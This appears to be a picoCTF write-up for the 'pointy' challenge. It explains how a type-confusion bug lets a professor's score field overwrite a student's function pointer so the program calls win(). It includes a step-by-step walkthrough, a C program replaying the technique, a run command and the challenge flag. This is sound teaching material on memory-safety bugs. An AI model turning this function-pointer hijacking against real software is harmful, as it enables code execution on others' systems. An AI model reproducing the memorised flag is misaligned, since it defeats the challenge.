Exploit the function pointers in this program. It is also found in /problems/pointy_4_3b3533bd4e08119669feda53e8cb0502 on the shell server. Source.
The provided program lets us add students and professors; students can then rate professors.

The bug is that the program does not check which kind of entry we select: we can pick a professor where it expects a student, and a student where it expects a professor. We can therefore write the `lastScore` field of a `Professor` and then have the program treat that same memory as a `Student`, which gives us control of its `scoreProfessor` field.

The `Student` and `Professor` structs are as follows:

`scoreProfessor` is a function pointer that sits at the same offset within `Student` as `lastScore` does within `Professor`. So we create a `Professor`, set its `lastScore` to the address of `win()`, and then select that professor in a place where the program expects a student. The program reads the `Professor` memory as a `Student`, so the bytes we stored in `lastScore` are read back as the `scoreProfessor` pointer, which now points at `win()`. (Normally `scoreProfessor` is set to `giveScoreToProfessor()` on line 79 of the source: `student->scoreProfessor=&giveScoreToProfessor;`.) When the program calls through that pointer close to the end of the file (`student->scoreProfessor(professor, value);`), `win()` runs instead and prints the flag.
Script () Walkthrough:

1. Allocate a student `s1`.
2. Allocate a professor `p1`.
3. Choose student `s1` to give the score.
4. Give the score to professor `p1`.
5. Enter the address of `win()` as the score; this sets the `lastScore` field of professor `p1` to that address.
6. The main loop restarts.
7. Allocate another student `s2` (only needed to reach the next prompts).
8. Allocate another professor `p2` (only needed to reach the next prompts).
9. Choose professor `p1` (whose `lastScore` now holds the address of `win()`) as the student giving the score. The program treats `p1` as a `Student`, so its `scoreProfessor` function pointer is now the address of `win()`.
10. Give the score to professor `p1`. The choice does not matter, since all we care about is the final call (`student->scoreProfessor(professor, value);`) where `scoreProfessor`, now `win()`, is invoked. `p2`, the spare professor created earlier, would work just as well here.
11. Give a score of `0` to professor `p1`. No score is actually written, because `scoreProfessor` points to `win()` rather than `giveScoreToProfessor()` after the `Professor`-as-`Student` confusion, so `win()` runs instead.
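To make the overlap and the confused call concrete, here is an added, self-contained C program that replays the walkthrough above in-process. It is not the challenge source and not the author's script: the struct layouts, the `NAME_SIZE` buffer, the `uintptr_t` score type and the `volatile` read are assumptions chosen so the demo runs on a 64-bit host; the only fact taken from the page is that `scoreProfessor` and `lastScore` sit at the same offset in their structs.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_SIZE 32   /* assumed name buffer size; the page does not show the real one */

/* Assumed reconstruction of the two layouts: a name buffer followed by one
 * pointer-sized field. The only property the exploit needs is that the field
 * after the name lands at the same offset in both structs. */
typedef struct Professor {
    char name[NAME_SIZE];
    uintptr_t lastScore;   /* assumed pointer-sized so a full address fits on this host */
} Professor;

typedef struct Student {
    char name[NAME_SIZE];
    void (*scoreProfessor)(Professor *professor, uintptr_t value);
} Student;

static int win_reached = 0;

/* Stand-in for the challenge's win(); the real one prints the flag. Its
 * signature matches scoreProfessor so the confused call is well-typed here. */
static void win(Professor *professor, uintptr_t value)
{
    (void)professor;
    (void)value;
    win_reached = 1;
    puts("win() reached: the real program would print the flag here");
}

/* Stand-in for giveScoreToProfessor(): the legitimate target of scoreProfessor. */
static void giveScoreToProfessor(Professor *professor, uintptr_t value)
{
    printf("Giving score %#lx to professor %s\n", (unsigned long)value, professor->name);
    professor->lastScore = value;
}

/* Precondition for the attack: the value field we can write and the function
 * pointer it will be read back as must occupy exactly the same bytes. */
int layouts_overlap(void)
{
    return offsetof(Professor, lastScore) == offsetof(Student, scoreProfessor)
        && sizeof(((Professor *)0)->lastScore) == sizeof(((Student *)0)->scoreProfessor);
}

/* Replays the walkthrough. Returns 1 if the call through the confused
 * pointer reached win(), 0 otherwise. */
int run_type_confusion(void)
{
    Student   s1;
    Professor p1;
    Professor p2;
    win_reached = 0;

    /* Create the entries the way the program would: name them and wire the
     * student's callback to the legitimate function (the page's line 79). */
    memset(&s1, 0, sizeof s1);
    memset(&p1, 0, sizeof p1);
    memset(&p2, 0, sizeof p2);
    strncpy(s1.name, "s1", NAME_SIZE - 1);
    strncpy(p1.name, "p1", NAME_SIZE - 1);
    strncpy(p2.name, "p2", NAME_SIZE - 1);
    s1.scoreProfessor = &giveScoreToProfessor;

    /* Steps 3-5: a legitimate rating whose "score" is the address of win().
     * It lands in p1.lastScore through the normal code path. */
    s1.scoreProfessor(&p1, (uintptr_t)&win);

    /* Step 9: the bug. p1 is selected where a Student is expected, so the same
     * bytes are read through a Student pointer and lastScore is now
     * scoreProfessor. Reinterpreting one struct as another is undefined
     * behaviour; the volatile qualifier (an addition for this demo) forces a
     * real reload so the optimizer cannot assume the two typed accesses are
     * unrelated. The vulnerable program relies on the plain cast. */
    volatile Student *confused = (volatile Student *)&p1;

    /* Steps 10-11: the final call. It dispatches to win() instead of
     * giveScoreToProfessor(), and the score of 0 is never written. */
    confused->scoreProfessor(&p2, 0);

    return win_reached;
}

int main(void)
{
    printf("layouts overlap: %d\n", layouts_overlap());
    printf("win reached:     %d\n", run_type_confusion());
    return 0;
}
```

Compile with `cc pointy_demo.c -o pointy_demo` and run it: `layouts_overlap()` confirms the precondition the exploit depends on, and `run_type_confusion()` returns 1 once `win()` has been reached. Against the real binary, the score typed in step 5 must be the numeric address of `win()` in that binary, and the value only survives as a usable pointer because the score field is as wide as a pointer there.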
Run `python script.py USER=<username> PASSWORD=<password>`:
picoCTF{g1v1ng_d1R3Ct10n5_c7465fbf}